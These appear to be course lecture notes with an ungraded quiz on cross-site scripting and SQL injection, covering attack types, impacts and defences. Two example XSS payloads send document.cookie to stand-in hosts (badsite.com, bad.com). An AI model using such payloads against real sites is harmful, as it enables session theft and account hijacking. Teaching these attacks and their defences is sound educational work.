XSS and SQL injection
Ungraded Quiz
- use an example to explain how a stored XSS attack works
- use an example to explain how a SQL injection attack works
Key concepts
XSS: cross-site scripting
-
injecting malicious scripts into HTML tags or or web pages 0 rendering the HTML causes the script to be executed
-
stored/persistent XSS:
Here is a picture of my dog <img id="mydogpic" src="dog.jpg"> <script>document.getElementById("mydogpic").src="http://badsite.com/dog.jpg?arg1=" + document.cookie </script>-
websites must sanitize input!
-
reflected (non-persistent) XSS:
Our favorite site for deals is www.good.com: <a href=’http://www.good.com/ <script>document.location="http://bad.com/dog.jpg?arg1="+document.cookie; </script>’> Click here </a>-
takes advantage of a site that returns 404 errors with
File-not-found: filepath-requested -
DOM-based XSS
- see DOM-based XSS
-
for another source on XSS attacks, see types of cross-site scripting
-
XSS impacts
- once you allow an attacker to inject JavaScript, they can do a lot
- browser redirection
- access cookies
- access browser-stored data for a website
- rewrite the document being displayed
- exploit browser vulnerabilities
-
defenses
- sanitize input by removing tags
- Content Security Policy
- server can specify which domains are allowed to execute scripts
SQL Injection
-
why a vulnerability exists
- databases store information in tables
- scripts construct SQL queries
- scripts use input from cookies, variables, users
-
SQL injection
- crafting input so an attacker chooses an SQL command to be executed
- extraction
- modification
- unauthorized account access
- denial of service
-
see [Example, page]
-
defenses
-
escaping problematic characters
-
denylists: filtering out denied commands
-
positive validation: only allowing certain commands
-